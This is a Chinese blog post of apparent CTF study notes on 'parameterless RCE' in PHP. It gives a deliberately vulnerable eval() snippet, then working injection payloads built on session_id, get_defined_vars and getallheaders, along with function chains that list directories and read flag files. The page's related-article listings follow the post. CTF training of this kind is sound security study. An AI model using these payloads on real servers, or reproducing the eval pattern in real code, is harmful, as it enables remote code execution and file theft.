无参数rce

最新推荐文章于 2024-04-10 16:31:45 发布
最新推荐文章于 2024-04-10 16:31:45 发布
阅读量2k 收藏 15
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45570082/article/details/106602261
版权

总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头))
首先准备代码

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) {   
   	eval($_GET['a']);}

利用session_id

php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有限定,不能使用 ’ () ',所以我们需要将我们要执行的命令转换成16进制,然后再通过hex2bin函数转换回去

<?php
echo bin2hex('phpinfo();');  //706870696e666f28293b

但是呢,session_id的使用需要开启session,所以需要session_start()函数
hex2bin(session_id(session_start()))
但是呢,仅仅一个eval执行上面代码只会把十六进制转换成字符串’phpinfo();’,所以我们还需要一个eval
最终
在这里插入图片描述

利用get_defined_vars ()函数

get_defined_vars():返回由所有已定义变量所组成的数组
下面我们先做一个实验

echo "<?php print_r(get_defined_vars()); ?>">4.php

在这里插入图片描述
我们通过get或者post方法传入的参数以及它的值能够通过该函数读取出来,
而get_defined_vars()返回的又是一个数组,我们能够通过php的一系列数组函数读取到该数组中任意我们想要的值

end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。

我们先尝试一下current
在这里插入图片描述
然后end
在这里插入图片描述
发现得到我们想要的字符串phpinfo();
最终payload

a=eval(end(current(get_defined_vars())));&b=phpinfo();

利用getallheaders()

getallheaders返回当前请求的所有请求头信息
直接使用
在这里插入图片描述
我是直接把Cache-Control的值改了,也可以操作其他的http头

其他的读取文件的方法

直接说利用代码吧

获得当前目录文件

var_dump(scandir(getcwd())); 
var_dump(scandir(current(localeconv()));  
var_dump(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))));    //利用三角函数和floor ceil,这个是php7下能够成功

获得上级目录文件

var_dump(scandir(dirname(getcwd())));
var_dump(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))));//这种方法理论上来说,每隔47秒才能成功执行一次
var_dump(scandir(chr(ceil(sqrt(cosh(tan(tan(tan(cosh(sinh(exp(chdir(next(scandir(pos(localeconv()))))))))))))))));

找到flag文件后的读取
如果flag是最后一个:end()
flag处于倒数第二个:next(array_reverse())
flag处于其他位置(这种靠运气):array_rand(array_flip())

附上三角函数的脚本,可以自己改一改,或者增加点函数

<?php
$list = array("ceil","sinh","cosh","tan","floor","sqrt","cos","sin");
foreach($list as $a){
foreach($list as $b){
foreach($list as $c){
foreach($list as $d){
foreach($list as $e){
foreach($list as $f){
foreach($list as $g){
foreach($list as $h){
if($a($b($c($d($e($f($g($h(phpversion())))))))) == 46)
echo "$a+$b+$c+$d+$e+$f+$g+$h"."\n";    
}}}}}}}}
?>

最后用读文件的函数读就可以了,什file_get_contents,readfile,highlight_file等等
就是这些了,以后还发现的话还会继续补充

参考链接:https://www.cnblogs.com/xhds/p/12881059.html
https://www.cnblogs.com/wangtanzhi/p/12260986.html
http://www.manongjc.com/detail/15-pkewlbdqeprvjeh.html
https://blog.csdn.net/qq_45449318/article/details/105237550
https://www.cnblogs.com/wangtanzhi/p/12311239.html

名字被抢的Stars
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
无参 RCE
snowlyzz的博客
08-07 593
无参rce
参数RCE
sGanYu
10-02 2149
[GXYCTF2019]禁止套娃 <?php include "flag.php";//执行并包含flag.php echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/.
无参rce总结
最新发布
weixin_66839513的博客
04-10 654
if(';R)?正则表达式 [^\W]+\((?R)?\) 匹配了一个或多个(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。
参数RCE总结
Manuffer的博客
10-13 5517
文章目录知识点概念常见绕过姿势1、getallheaders()2、get_defined_vars()3、session_id()配合使用的函数CTF例题[GXYCTF2019]禁止套娃姿势一:array_reverse()姿势二:session_id() 知识点 概念 无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。 没有参数的函数什么意思?一般该类题目代码如下(或类似): <?php if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NU
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
non_RCE
03-12
在IT行业中,"RCE"通常指的是"远程代码执行"(Remote Code Execution),这是一种非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码。"non_RCE"这个标题可能是暗示我们正在处理一个与RCE漏洞不同的问题或者是...
phpstudy后门rce批量利用脚本的实现
10-15
`write_shell`函数是核心功能,它接收URL和请求头作为参数,尝试连接并检测是否存在后门。如果返回的响应中包含了`echo`命令的输出,那么就认为后门存在并成功利用。此外,脚本还提供了将成功利用的URL记录到文件`...
Yii 框架反序列化 RCE 利用链 2(官方无补丁)1
08-03
5. 在 `UnicodeString` 的 `__wakeup` 方法中,`normalizer_is_normalized` 方法被调用,其参数是 `$this->string`,这个值是 `LazyString` 的实例。 6. `LazyString` 的 `__toString` 方法被调用,这将执行 `$this-...
RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络
09-23
文件“RCE.m”很可能就是用MATLAB编写的一个RCE网络的实现脚本,可能包含了网络的定义、训练过程、参数调整以及结果分析等功能。 在构建RCE网络时,通常需要考虑以下关键步骤: 1. **网络结构设计**:确定网络的层...
参数函数RCE
weixin_53146913的博客
07-19 1715
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
初探无参数RCE
weixin_46330722的博客
12-07 2659
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
RCE参数构造
nobugnomoney的博客
05-24 1320
一、RCE参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
初学无参数RCE
m0_62709637的博客
05-12 512
前置知识: 1、文件读取函数: show_source(): highlight_file():对文件进行语法高亮显示; readfile(): file_get_contents(): file(): tips:show_source()和highlight_file()函数无法直接在页面输出需要配合echo()等函数一同使用; 2、写题时常用的输出函数: print_r(): var_dump(): echo(): 3、无参数rce常见正则匹配 1、'/[^\W]+\((?R)?\
无参函数的RCE
silence1_的博客
10-31 2384
无参函数的RCE 最近遇到挺多rce的题,这里记录一下关于无参函数的rce。 先看看代码: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } ?> 很明了,...
Byte CTF boring_code(fuzz,无参数RCE)
a3320315的博客
11-09 1893
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
php参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 507
前言最近做了一些 php参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
深入浅出带你学习无参RCE
老司机的后备箱
02-16 701
最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
php RCE常用函数
08-26
PHP中常用的RCE(远程代码执行)函数包括preg_match、array_values、current和eval。其中,preg_match函数主要用于过滤函数,将一些常用不带参数的函数的关键部分过滤掉,需要使用其他方法来执行命令。 array_values函数可以将数组的值重新组成一个数组,配合current函数可以取出数组的第一个值,用于RCE。另外,chdir()函数返回的是布尔类型的true,对不需要传入参数的time()函数没有影响,可以正常执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [浅谈无参数RCE](https://blog.csdn.net/weixin_30568317/article/details/116284685)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值